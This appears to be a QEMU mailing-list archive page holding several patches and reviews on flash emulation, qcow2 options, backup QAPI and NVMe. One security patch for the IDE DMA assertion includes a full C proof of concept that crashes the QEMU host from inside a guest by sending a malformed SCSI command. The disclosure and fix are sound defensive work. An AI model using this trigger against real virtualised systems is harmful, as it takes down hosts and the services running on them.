 2 files changed, 21 insertions(+), 16 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index 58cbef0588..81fbdbde7f 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -112,6 +112,14 @@ static const VMStateDescription vmstate_pflash = {
 }
 };
 
+static void pflash_mode_read_array(PFlashCFI01 *pfl)
+{
+trace_pflash_mode_read_array();
+pfl->cmd = 0xff; /* Read Array */
+pfl->wcycle = 0;
+memory_region_rom_device_set_romd(&pfl->mem, true);
+}
+
 /* Perform a CFI query based on the bank width of the flash.
  * If this code is called we know we have a device_width set for
  * this flash.
@@ -469,7 +477,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 case 0x50: /* Clear status bits */
 DPRINTF("%s: Clear status bits\n", __func__);
 pfl->status = 0x0;
-goto reset_flash;
+goto mode_read_array;
 case 0x60: /* Block (un)lock */
 DPRINTF("%s: Block unlock\n", __func__);
 break;
@@ -494,10 +502,10 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 break;
 case 0xf0: /* Probe for AMD flash */
 DPRINTF("%s: Probe for AMD flash\n", __func__);
-goto reset_flash;
+goto mode_read_array;
 case 0xff: /* Read array mode */
 DPRINTF("%s: Read array mode\n", __func__);
-goto reset_flash;
+goto mode_read_array;
 default:
 goto error_flash;
 }
@@ -524,7 +532,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 pfl->wcycle = 0;
 pfl->status |= 0x80;
 } else if (cmd == 0xff) { /* Read Array */
-goto reset_flash;
+goto mode_read_array;
 } else
 goto error_flash;
 
@@ -551,15 +559,15 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 pfl->wcycle = 0;
 pfl->status |= 0x80;
 } else if (cmd == 0xff) { /* read array mode */
-goto reset_flash;
+goto mode_read_array;
 } else {
 DPRINTF("%s: Unknown (un)locking command\n", __func__);
-goto reset_flash;
+goto mode_read_array;
 }
 break;
 case 0x98:
 if (cmd == 0xff) {
-goto reset_flash;
+goto mode_read_array;
 } else {
 DPRINTF("%s: leaving query mode\n", __func__);
 }
@@ -619,7 +627,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 " the data is already written to storage!\n"
 "Flash device reset into READ mode.\n",
 __func__);
-goto reset_flash;
+goto mode_read_array;
 }
 break;
 default:
@@ -629,7 +637,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 default:
 /* Should never happen */
 DPRINTF("%s: invalid write state\n",  __func__);
-goto reset_flash;
+goto mode_read_array;
 }
 return;
 
@@ -638,11 +646,8 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
   "(offset " TARGET_FMT_plx ", wcycle 0x%x cmd 0x%x value 
0x%x)"
   "\n", __func__, offset, pfl->wcycle, pfl->cmd, value);
 
- reset_flash:
-trace_pflash_reset();
-memory_region_rom_device_set_romd(&pfl->mem, true);
-pfl->wcycle = 0;
-pfl->cmd = 0xff;
+ mode_read_array:
+pflash_mode_read_array(pfl);
 }
 
 
@@ -757,8 +762,7 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->max_device_width = pfl->device_width;
 }
 
-pfl->wcycle = 0;
-pfl->cmd = 0xff;
+pflash_mode_read_array(pfl);
 pfl->status = 0;
 /* Hardcoded CFI table */
 /* Standard "QRY" string */
diff --git a/hw/block/trace-events b/hw/block/trace-events
index 13d1b21dd4..91a8a106c0 100644
--- a/hw/block/trace-events

[Qemu-block] [PATCH v3 0/9] hw/block/pflash_cfi01: Add DeviceReset() handler

2019-07-05 Thread Philippe Mathieu-Daudé
The pflash device lacks a reset() function.
When a machine is reset, the flash might be in an
inconsistent state, leading to unexpected behavior:
https://bugzilla.redhat.com/show_bug.cgi?id=1678713
Resolve this issue by adding a DeviceReset() handler.

Also fix two minor issues, and clean up the codebase a bit.

Since v1: https://lists.gnu.org/archive/html/qemu-devel/2019-05/msg00962.html
- addressed Laszlo review comments

Since v2:
- consider migration (Laszlo, Peter)

$ git backport-diff -u v2
Key:
[----] : patches are identical
[####] : number of functional differences between upstream/downstream patch
[down] : patch is downstream-only
The flags [FC] indicate (F)unctional and (C)ontextual differences, respectively

001/9:[----] [--] 'hw/block/pflash_cfi01: Removed an unused timer'
002/9:[0008] [FC] 'hw/block/pflash_cfi01: Use the correct READ_ARRAY value'
003/9:[----] [-C] 'hw/block/pflash_cfi01: Extract pflash_mode_read_array()'
004/9:[----] [--] 'hw/block/pflash_cfi01: Start state machine as READY to accept commands'
005/9:[----] [--] 'hw/block/pflash_cfi01: Add the DeviceReset() handler'
006/9:[----] [--] 'hw/block/pflash_cfi01: Simplify CFI_QUERY processing'
007/9:[----] [--] 'hw/block/pflash_cfi01: Improve command comments'
008/9:[----] [--] 'hw/block/pflash_cfi01: Replace DPRINTF by qemu_log_mask(GUEST_ERROR)'
009/9:[----] [--] 'hw/block/pflash_cfi01: Hold the PRI table offset in a variable'

Functional differences on patch #2 are the 6 lines added for
migration of the 'cmd' field, and the updated commit description.

Regards,

Phil.

Philippe Mathieu-Daudé (9):
  hw/block/pflash_cfi01: Removed an unused timer
  hw/block/pflash_cfi01: Use the correct READ_ARRAY value
  hw/block/pflash_cfi01: Extract pflash_mode_read_array()
  hw/block/pflash_cfi01: Start state machine as READY to accept commands
  hw/block/pflash_cfi01: Add the DeviceReset() handler
  hw/block/pflash_cfi01: Simplify CFI_QUERY processing
  hw/block/pflash_cfi01: Improve command comments
  hw/block/pflash_cfi01: Replace DPRINTF by qemu_log_mask(GUEST_ERROR)
  hw/block/pflash_cfi01: Hold the PRI table offset in a variable

 hw/block/pflash_cfi01.c | 148 ++--
 hw/block/trace-events   |   1 +
 2 files changed, 81 insertions(+), 68 deletions(-)

-- 
2.20.1




[Qemu-block] [PATCH v3 4/9] hw/block/pflash_cfi01: Start state machine as READY to accept commands

2019-07-05 Thread Philippe Mathieu-Daudé
When the state machine is ready to accept commands, bit 7 of
the status register (SR) is set to 1.
The guest polls the status register and checks this bit before
writing commands to the internal 'Write State Machine' (WSM).

Set SR.7 bit to 1 when the device is created.

There is no migration impact by this change.

Reference: Read Array Flowchart
  "Common Flash Interface (CFI) and Command Sets"
   (Intel Application Note 646)
   Appendix B "Basic Command Set"

Reviewed-by: John Snow 
Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
v3: Added migration comment.
---
 hw/block/pflash_cfi01.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index 81fbdbde7f..200bfd0ab8 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -763,7 +763,7 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 }
 
 pflash_mode_read_array(pfl);
-pfl->status = 0;
+pfl->status = 0x80; /* WSM ready */
 /* Hardcoded CFI table */
 /* Standard "QRY" string */
 pfl->cfi_table[0x10] = 'Q';
-- 
2.20.1




[Qemu-block] [PATCH v3 2/9] hw/block/pflash_cfi01: Use the correct READ_ARRAY value

2019-07-05 Thread Philippe Mathieu-Daudé
In the "Read Array Flowchart" the command has a value of 0xFF.

In the document [*] the "Read Array Flowchart", the READ_ARRAY
command has a value of 0xff.

Use the correct value in the pflash model.

There is no change of behavior in the guest, because:
- when the guest sent 0xFF, the reset_flash label
  set the command value to 0x00
- 0x00 was used internally for READ_ARRAY

To keep migration behaving correctly, we have to increase
the VMState version. When migrating from an older version,
we use the correct command value.

[*] "Common Flash Interface (CFI) and Command Sets"
(Intel Application Note 646)
Appendix B "Basic Command Set"

Reviewed-by: John Snow 
Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
v3: Handle migrating the 'cmd' field.

Since Laszlo stated he did not test migration [*], I'm keeping his
test tag, because the change since v2 has no impact on the tests
he ran.

Likewise I'm keeping John and Alistair tags, but I'd like an extra
review for the migration change, thanks!

[*] https://lists.gnu.org/archive/html/qemu-devel/2019-07/msg00679.html
---
 hw/block/pflash_cfi01.c | 23 +--
 1 file changed, 13 insertions(+), 10 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index 9e34fd4e82..58cbef0588 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -100,7 +100,7 @@ static int pflash_post_load(void *opaque, int version_id);
 
 static const VMStateDescription vmstate_pflash = {
 .name = "pflash_cfi01",
-.version_id = 1,
+.version_id = 2,
 .minimum_version_id = 1,
 .post_load = pflash_post_load,
 .fields = (VMStateField[]) {
@@ -277,10 +277,9 @@ static uint32_t pflash_read(PFlashCFI01 *pfl, hwaddr 
offset,
 /* This should never happen : reset state & treat it as a read */
 DPRINTF("%s: unknown command state: %x\n", __func__, pfl->cmd);
 pfl->wcycle = 0;
-pfl->cmd = 0;
+pfl->cmd = 0xff;
 /* fall through to read code */
-case 0x00:
-/* Flash area read */
+case 0xff: /* Read Array */
 ret = pflash_data_read(pfl, offset, width, be);
 break;
 case 0x10: /* Single byte program */
@@ -448,8 +447,6 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 case 0:
 /* read mode */
 switch (cmd) {
-case 0x00: /* ??? */
-goto reset_flash;
 case 0x10: /* Single Byte Program */
 case 0x40: /* Single Byte Program */
 DPRINTF("%s: Single Byte Program\n", __func__);
@@ -526,7 +523,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 if (cmd == 0xd0) { /* confirm */
 pfl->wcycle = 0;
 pfl->status |= 0x80;
-} else if (cmd == 0xff) { /* read array mode */
+} else if (cmd == 0xff) { /* Read Array */
 goto reset_flash;
 } else
 goto error_flash;
@@ -553,7 +550,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 } else if (cmd == 0x01) {
 pfl->wcycle = 0;
 pfl->status |= 0x80;
-} else if (cmd == 0xff) {
+} else if (cmd == 0xff) { /* read array mode */
 goto reset_flash;
 } else {
 DPRINTF("%s: Unknown (un)locking command\n", __func__);
@@ -645,7 +642,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 trace_pflash_reset();
-memory_region_rom_device_set_romd(&pfl->mem, true);
 pfl->wcycle = 0;
-pfl->cmd = 0;
+pfl->cmd = 0xff;
 }
 
 
@@ -761,7 +758,7 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 }
 
 pfl->wcycle = 0;
-pfl->cmd = 0;
+pfl->cmd = 0xff;
 pfl->status = 0;
 /* Hardcoded CFI table */
 /* Standard "QRY" string */
@@ -1001,5 +998,11 @@ static int pflash_post_load(void *opaque, int version_id)
 pfl->vmstate = qemu_add_vm_change_state_handler(postload_update_cb,
 pfl);
 }
+if (version_id < 2) {
+/* v1 used incorrect value of 0x00 for the READ_ARRAY command. */
+if (pfl->cmd == 0x00) {
+pfl->cmd =  0xff;
+}
+}
 return 0;
 }
-- 
2.20.1




[Qemu-block] [PATCH v3 1/9] hw/block/pflash_cfi01: Removed an unused timer

2019-07-05 Thread Philippe Mathieu-Daudé
The 'CFI02' NOR flash was introduced in commit 29133e9a0fff, with
timing modelled. One year later, the CFI01 model was introduced
(commit 05ee37ebf630) based on the CFI02 model. As noted in the
header, "It does not support timings". 12 years later, we never
had to model the device timings. Time to remove the unused timer;
we can still add it back if required.

Suggested-by: Laszlo Ersek 
Reviewed-by: Wei Yang 
Reviewed-by: Laszlo Ersek 
Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
v2: Fixed commit description (Laszlo)
---
 hw/block/pflash_cfi01.c | 15 ---
 1 file changed, 15 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index db4a246b22..9e34fd4e82 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -42,7 +42,6 @@
 #include "hw/block/flash.h"
 #include "sysemu/block-backend.h"
 #include "qapi/error.h"
-#include "qemu/timer.h"
 #include "qemu/bitops.h"
 #include "qemu/error-report.h"
 #include "qemu/host-utils.h"
@@ -90,7 +89,6 @@ struct PFlashCFI01 {
 uint8_t cfi_table[0x52];
 uint64_t counter;
 unsigned int writeblock_size;
-QEMUTimer *timer;
 MemoryRegion mem;
 char *name;
 void *storage;
@@ -114,18 +112,6 @@ static const VMStateDescription vmstate_pflash = {
 }
 };
 
-static void pflash_timer (void *opaque)
-{
-PFlashCFI01 *pfl = opaque;
-
-trace_pflash_timer_expired(pfl->cmd);
-/* Reset flash */
-pfl->status ^= 0x80;
-memory_region_rom_device_set_romd(&pfl->mem, true);
-pfl->wcycle = 0;
-pfl->cmd = 0;
-}
-
 /* Perform a CFI query based on the bank width of the flash.
  * If this code is called we know we have a device_width set for
  * this flash.
@@ -774,7 +760,6 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->max_device_width = pfl->device_width;
 }
 
-pfl->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, pflash_timer, pfl);
 pfl->wcycle = 0;
 pfl->cmd = 0;
 pfl->status = 0;
-- 
2.20.1




[Qemu-block] [PATCH for-4.1] qcow2: Allow -o compat=v3 during qemu-img amend

2019-07-05 Thread Eric Blake
Commit b76b4f60 allowed '-o compat=v3' as an alias for the
less-appealing '-o compat=1.1' for 'qemu-img create' since we want to
use the QMP form as much as possible, but forgot to do likewise for
qemu-img amend.  Also, it doesn't help that '-o help' doesn't list our
new preferred spellings.

Signed-off-by: Eric Blake 
---

I'm arguing that the lack of consistency is a bug, even though the bug
has been present since 2.12.
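
With this applied, 'qemu-img amend -o compat=v3 foo.qcow2' (and
'-o compat=v2') is accepted just like the numeric spellings, matching
what 'qemu-img create' already allows, and '-o help' now lists the
preferred names.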

 block/qcow2.c | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/block/qcow2.c b/block/qcow2.c
index 2a59eb27febb..039bdc2f7e79 100644
--- a/block/qcow2.c
+++ b/block/qcow2.c
@@ -4823,9 +4823,9 @@ static int qcow2_amend_options(BlockDriverState *bs, 
QemuOpts *opts,
 compat = qemu_opt_get(opts, BLOCK_OPT_COMPAT_LEVEL);
 if (!compat) {
 /* preserve default */
-} else if (!strcmp(compat, "0.10")) {
+} else if (!strcmp(compat, "0.10") || !strcmp(compat, "v2")) {
 new_version = 2;
-} else if (!strcmp(compat, "1.1")) {
+} else if (!strcmp(compat, "1.1") || !strcmp(compat, "v3")) {
 new_version = 3;
 } else {
 error_setg(errp, "Unknown compatibility level %s", compat);
@@ -5098,7 +5098,7 @@ static QemuOptsList qcow2_create_opts = {
 {
 .name = BLOCK_OPT_COMPAT_LEVEL,
 .type = QEMU_OPT_STRING,
-.help = "Compatibility level (0.10 or 1.1)"
+.help = "Compatibility level (v2 [0.10] or v3 [1.1])"
 },
 {
 .name = BLOCK_OPT_BACKING_FILE,
-- 
2.20.1




Re: [Qemu-block] [QEMU-SECURITY] ide: fix assertion in ide_dma_cb() to prevent qemu DoS from quest

2019-07-05 Thread Alexander Popov
On 05.07.2019 17:07, Alexander Popov wrote:
> This assertion was introduced in the commit a718978ed58a in July 2015.
> It implies that the size of successful DMA transfers handled in
> ide_dma_cb() should be a multiple of 512 (the size of a sector).
> 
> But guest systems can initiate DMA transfers that don't fit this
> requirement. Let's improve the assertion to prevent qemu DoS from guests.

Hello everyone!

This bug was not considered a security issue by the QEMU security team, so I am
sending this patch to the public mailing list.

Best regards,
Alexander



[Qemu-block] [QEMU-SECURITY] ide: fix assertion in ide_dma_cb() to prevent qemu DoS from quest

2019-07-05 Thread Alexander Popov
This assertion was introduced in the commit a718978ed58a in July 2015.
It implies that the size of successful DMA transfers handled in
ide_dma_cb() should be a multiple of 512 (the size of a sector).

But guest systems can initiate DMA transfers that don't fit this
requirement. Let's improve the assertion to prevent qemu DoS from guests.
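
(The relaxed check only requires that n matches the number of complete
sectors in s->sg.size, rather than insisting that s->sg.size is an exact
multiple of the sector size, so an odd-sized transfer set up by the guest
no longer trips the assertion.)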

PoC for Linux that uses SCSI_IOCTL_SEND_COMMAND to perform such an ATA
command and crash qemu:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <scsi/scsi.h>
#include <scsi/scsi_ioctl.h>
#include <scsi/sg.h>

#define CMD_SIZE 2048

struct scsi_ioctl_cmd_6 {
unsigned int inlen;
unsigned int outlen;
unsigned char cmd[6];
unsigned char data[];
};

int main(void)
{
intptr_t fd = 0;
struct scsi_ioctl_cmd_6 *cmd = NULL;

cmd = malloc(CMD_SIZE);
if (!cmd) {
perror("[-] malloc");
return 1;
}

memset(cmd, 0, CMD_SIZE);
cmd->inlen = 1337;
cmd->cmd[0] = READ_6;

fd = open("/dev/sg0", O_RDONLY);
if (fd == -1) {
perror("[-] opening sg");
return 1;
}

printf("[+] sg0 is opened\n");

printf("[.] qemu should break here:\n");
fflush(stdout);
ioctl(fd, SCSI_IOCTL_SEND_COMMAND, cmd);
printf("[-] qemu didn't break\n");

free(cmd);

return 1;
}

Signed-off-by: Alexander Popov 
---
 hw/ide/core.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/hw/ide/core.c b/hw/ide/core.c
index 6afadf8..304fe69 100644
--- a/hw/ide/core.c
+++ b/hw/ide/core.c
@@ -868,7 +868,7 @@ static void ide_dma_cb(void *opaque, int ret)
 
 sector_num = ide_get_sector(s);
 if (n > 0) {
-assert(n * 512 == s->sg.size);
+assert(n == s->sg.size / 512);
 dma_buf_commit(s, s->sg.size);
 sector_num += n;
 ide_set_sector(s, sector_num);
-- 
2.7.4




Re: [Qemu-block] [Qemu-devel] [PATCH v2 04/18] qapi: add BitmapSyncMode enum

2019-07-05 Thread Markus Armbruster
John Snow  writes:

> Depending on what a user is trying to accomplish, there might be a few
> bitmap cleanup actions that occur when an operation is finished that
> could be useful.
>
> I am proposing three:
> - NEVER: The bitmap is never synchronized against what was copied.
> - ALWAYS: The bitmap is always synchronized, even on failures.
> - CONDITIONAL: The bitmap is synchronized only on success.
>
> The existing incremental backup modes use 'conditional' semantics,
> so add just that one for right now.
>
> Signed-off-by: John Snow 
> ---
>  qapi/block-core.json | 14 ++
>  1 file changed, 14 insertions(+)
>
> diff --git a/qapi/block-core.json b/qapi/block-core.json
> index 7b23efcf13..87eba5a5d9 100644
> --- a/qapi/block-core.json
> +++ b/qapi/block-core.json
> @@ -1134,6 +1134,20 @@
>  { 'enum': 'MirrorSyncMode',
>'data': ['top', 'full', 'none', 'incremental'] }
>  
> +##
> +# @BitmapSyncMode:
> +#
> +# An enumeration of possible behaviors for the synchronization of a bitmap
> +# when used for data copy operations.
> +#
> +# @conditional: The bitmap is only synced when the operation is successful.
> +#   This is the behavior always used for 'INCREMENTAL' backups.
> +#
> +# Since: 4.2
> +##
> +{ 'enum': 'BitmapSyncMode',
> +  'data': ['conditional'] }
> +
>  ##
>  # @MirrorCopyMode:
>  #

The name "conditional" makes me go "on what?".  What about "on-success"?



Re: [Qemu-block] [Qemu-devel] [PATCH v2 01/18] qapi/block-core: Introduce BackupCommon

2019-07-05 Thread Markus Armbruster
John Snow  writes:

> drive-backup and blockdev-backup have an awful lot of things in common
> that are the same. Let's fix that.
>
> I don't deduplicate 'target', because the semantics actually did change
> between each structure. Leave that one alone so it can be documented
> separately.
>
> Signed-off-by: John Snow 
> ---
>  qapi/block-core.json | 103 ++-
>  1 file changed, 33 insertions(+), 70 deletions(-)
>
> diff --git a/qapi/block-core.json b/qapi/block-core.json
> index 0d43d4f37c..7b23efcf13 100644
> --- a/qapi/block-core.json
> +++ b/qapi/block-core.json
> @@ -1315,32 +1315,23 @@
>'data': { 'node': 'str', 'overlay': 'str' } }
>  
>  ##
> -# @DriveBackup:
> +# @BackupCommon:
>  #
>  # @job-id: identifier for the newly-created block job. If
>  #  omitted, the device name will be used. (Since 2.7)
>  #
>  # @device: the device name or node-name of a root node which should be 
> copied.
>  #
> -# @target: the target of the new image. If the file exists, or if it
> -#  is a device, the existing file/device will be used as the new
> -#  destination.  If it does not exist, a new file will be created.
> -#
> -# @format: the format of the new destination, default is to
> -#  probe if @mode is 'existing', else the format of the source
> -#
>  # @sync: what parts of the disk image should be copied to the destination
>  #(all the disk, only the sectors allocated in the topmost image, 
> from a
>  #dirty bitmap, or only new I/O).

This is DriveBackup's wording.  Blockdev lacks "from a dirty bitmap, ".
Is this a doc fix?

>  #
> -# @mode: whether and how QEMU should create a new image, default is
> -#'absolute-paths'.
> -#
> -# @speed: the maximum speed, in bytes per second
> +# @speed: the maximum speed, in bytes per second. The default is 0,
> +# for unlimited.

This is Blockdev's wording.  DriveBackup lacks "the default is 0, for
unlimited."  Is this a doc fix?

>  #
>  # @bitmap: the name of dirty bitmap if sync is "incremental".
>  #  Must be present if sync is "incremental", must NOT be present
> -#  otherwise. (Since 2.4)
> +#  otherwise. (Since 2.4 (Drive), 3.1 (Blockdev))

I second Max's request to say (drive-backup) and (blockdev-backup),
strongly.

>  #
>  # @compress: true to compress data, if the target format supports it.
>  #(default: false) (since 2.8)
> @@ -1372,73 +1363,45 @@
>  #
>  # Since: 1.6

BackupCommon is actually since 4.2.

The type doesn't appear in the external interface (only its extensions
DriveBackup and BlockdevBackup do), so documenting "since" is actually
pointless.  However, we blindly document "since" for *everything*,
simply because we don't want to waste time on deciding whether we have
to.

>  ##
> +{ 'struct': 'BackupCommon',
> +  'data': { '*job-id': 'str', 'device': 'str',
> +'sync': 'MirrorSyncMode', '*speed': 'int',
> +'*bitmap': 'str', '*compress': 'bool',
> +'*on-source-error': 'BlockdevOnError',
> +'*on-target-error': 'BlockdevOnError',
> +'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
> +
> +##
> +# @DriveBackup:
> +#
> +# @target: the target of the new image. If the file exists, or if it
> +#  is a device, the existing file/device will be used as the new
> +#  destination.  If it does not exist, a new file will be created.
> +#
> +# @format: the format of the new destination, default is to
> +#  probe if @mode is 'existing', else the format of the source
> +#
> +# @mode: whether and how QEMU should create a new image, default is
> +#'absolute-paths'.
> +#
> +# Since: 1.6
> +##
>  { 'struct': 'DriveBackup',
> -  'data': { '*job-id': 'str', 'device': 'str', 'target': 'str',
> -'*format': 'str', 'sync': 'MirrorSyncMode',
> -'*mode': 'NewImageMode', '*speed': 'int',
> -'*bitmap': 'str', '*compress': 'bool',
> -'*on-source-error': 'BlockdevOnError',
> -'*on-target-error': 'BlockdevOnError',
> -'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
> +  'base': 'BackupCommon',
> +  'data': { 'target': 'str',
> +'*format': 'str',
> +'*mode': 'NewImageMode' } }
>  
>  ##
>  # @BlockdevBackup:
>  #
> -# @job-id: identifier for the newly-created block job. If
> -#  omitted, the device name will be used. (Since 2.7)
> -#
> -# @device: the device name or node-name of a root node which should be 
> copied.
> -#
>  # @target: the device name or node-name of the backup target node.
>  #
> -# @sync: what parts of the disk image should be copied to the destination
> -#(all the disk, only the sectors allocated in the topmost image, or
> -#only new I/O).
> -#
> -# @speed: the maximum speed, in bytes per second. The default is 0,
> -# for unlimited.
> -#
> -# @bitmap: the name of dirty bitmap if sync is 

Re: [Qemu-block] [PATCH v4] block/nvme: add support for discard

2019-07-05 Thread Max Reitz
On 03.07.19 18:07, Maxim Levitsky wrote:
> Signed-off-by: Maxim Levitsky 
> ---
>  block/nvme.c   | 81 ++
>  block/trace-events |  2 ++
>  2 files changed, 83 insertions(+)
> 
> diff --git a/block/nvme.c b/block/nvme.c
> index 02e0846643..96a715dcc1 100644
> --- a/block/nvme.c
> +++ b/block/nvme.c

[...]

> @@ -460,6 +461,7 @@ static void nvme_identify(BlockDriverState *bs, int 
> namespace, Error **errp)
>s->page_size / sizeof(uint64_t) * s->page_size);
>  
>  s->supports_write_zeros = (idctrl->oncs & NVME_ONCS_WRITE_ZEROS) != 0;
> +s->supports_discard = (idctrl->oncs & NVME_ONCS_DSM) != 0;

Shouldn’t this be le16_to_cpu(idctrl->oncs)?  Same in the previous
patch, now that I think about it.

>  
>  memset(resp, 0, 4096);
>  
> @@ -1149,6 +1151,84 @@ static coroutine_fn int 
> nvme_co_pwrite_zeroes(BlockDriverState *bs,
>  }
>  
>  
> +static int coroutine_fn nvme_co_pdiscard(BlockDriverState *bs,
> + int64_t offset,
> + int bytes)
> +{
> +BDRVNVMeState *s = bs->opaque;
> +NVMeQueuePair *ioq = s->queues[1];
> +NVMeRequest *req;
> +NvmeDsmRange *buf;
> +QEMUIOVector local_qiov;
> +int r;
> +
> +NvmeCmd cmd = {
> +.opcode = NVME_CMD_DSM,
> +.nsid = cpu_to_le32(s->nsid),
> +.cdw10 = 0, /*number of ranges - 0 based*/

I’d make this cpu_to_le32(0).  Sure, there is no effect for 0, but in
theory this is a variable value, so...

> +.cdw11 = cpu_to_le32(1 << 2), /*deallocate bit*/
> +};
> +
> +NVMeCoData data = {
> +.ctx = bdrv_get_aio_context(bs),
> +.ret = -EINPROGRESS,
> +};
> +
> +if (!s->supports_discard) {
> +return -ENOTSUP;
> +}
> +
> +assert(s->nr_queues > 1);
> +
> +buf = qemu_try_blockalign0(bs, 4096);

I’m not sure whether this needs to be 4096 or whether 16 would suffice,
 but I suppose this gets us the least trouble.

> +if (!buf) {
> +return -ENOMEM;

Indentation is off.

> +}
> +
> +buf->nlb = cpu_to_le32(bytes >> s->blkshift);
> +buf->slba = cpu_to_le64(offset >> s->blkshift);
> +buf->cattr = 0;
> +
> +qemu_iovec_init(&local_qiov, 1);
> +qemu_iovec_add(&local_qiov, buf, 4096);
> +
> +req = nvme_get_free_req(ioq);
> +assert(req);
> +
> +qemu_co_mutex_lock(&s->dma_map_lock);
> +r = nvme_cmd_map_qiov(bs, &cmd, req, &local_qiov);
> +qemu_co_mutex_unlock(&s->dma_map_lock);
> +
> +if (r) {
> +req->busy = false;
> +return r;

Leaking buf and local_qiov here.

> +}
> +
> +trace_nvme_dsm(s, offset, bytes);
> +
> +nvme_submit_command(s, ioq, req, &cmd, nvme_rw_cb, &data);
> +
> +data.co = qemu_coroutine_self();
> +while (data.ret == -EINPROGRESS) {
> +qemu_coroutine_yield();
> +}
> +
> +qemu_co_mutex_lock(&s->dma_map_lock);
> +r = nvme_cmd_unmap_qiov(bs, &local_qiov);
> +qemu_co_mutex_unlock(&s->dma_map_lock);
> +if (r) {
> +return r;

Leaking buf and local_qiov here, too.
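
One way to cover both spots would be to funnel every exit through a
single cleanup block, roughly (a sketch only, reusing the names from the
patch; the submit/yield part stays as it is):

    qemu_co_mutex_lock(&s->dma_map_lock);
    r = nvme_cmd_map_qiov(bs, &cmd, req, &local_qiov);
    qemu_co_mutex_unlock(&s->dma_map_lock);
    if (r) {
        req->busy = false;
        goto out;                 /* previously leaked buf/local_qiov */
    }

    /* ... nvme_submit_command() and the yield loop, unchanged ... */

    qemu_co_mutex_lock(&s->dma_map_lock);
    r = nvme_cmd_unmap_qiov(bs, &local_qiov);
    qemu_co_mutex_unlock(&s->dma_map_lock);
    if (!r) {
        trace_nvme_dsm_done(s, offset, bytes, data.ret);
        r = data.ret;
    }
out:
    qemu_iovec_destroy(&local_qiov);
    qemu_vfree(buf);
    return r;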

Max

> +}
> +
> +trace_nvme_dsm_done(s, offset, bytes, data.ret);
> +
> +qemu_iovec_destroy(&local_qiov);
> +qemu_vfree(buf);
> +return data.ret;
> +
> +}
> +
> +
>  static int nvme_reopen_prepare(BDRVReopenState *reopen_state,
> BlockReopenQueue *queue, Error **errp)
>  {





Re: [Qemu-block] [Qemu-devel] [PATCH 16/16] nvme: support multiple namespaces

2019-07-05 Thread Daniel P . Berrangé
On Fri, Jul 05, 2019 at 03:36:17PM +0200, Klaus Birkelund wrote:
> On Fri, Jul 05, 2019 at 09:23:33AM +0200, Klaus Birkelund Jensen wrote:
> > This adds support for multiple namespaces by introducing a new 'nvme-ns'
> > device model. The nvme device creates a bus named from the device name
> > ('id'). The nvme-ns devices then connect to this and registers
> > themselves with the nvme device.
> > 
> > This changes how an nvme device is created. Example with two namespaces:
> > 
> >   -drive file=nvme0n1.img,if=none,id=disk1
> >   -drive file=nvme0n2.img,if=none,id=disk2
> >   -device nvme,serial=deadbeef,id=nvme0
> >   -device nvme-ns,drive=disk1,bus=nvme0,nsid=1
> >   -device nvme-ns,drive=disk2,bus=nvme0,nsid=2
> > 
> > A maximum of 256 namespaces can be configured.
> > 
>  
> Well, that was embarrassing.
> 
> This patch breaks nvme-test.c. Which I obviously did not run.
> 
> In my defense, the test doesn't do much currently, but I'll of course
> fix the test for v2.

That highlights a more serious problem.  This series changes the syntax
for configuring the nvme device in a way that is not backwards compatible.
So anyone who is using QEMU with NVME will be broken when they upgrade
to the next QEMU release.

I understand why you wanted to restructure things to have a separate
nvme-ns device, but there needs to be some backcompat support in there
for the existing syntax to avoid breaking current users IMHO.


Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|



Re: [Qemu-block] [PATCH 16/16] nvme: support multiple namespaces

2019-07-05 Thread Klaus Birkelund
On Fri, Jul 05, 2019 at 09:23:33AM +0200, Klaus Birkelund Jensen wrote:
> This adds support for multiple namespaces by introducing a new 'nvme-ns'
> device model. The nvme device creates a bus named from the device name
> ('id'). The nvme-ns devices then connect to this and registers
> themselves with the nvme device.
> 
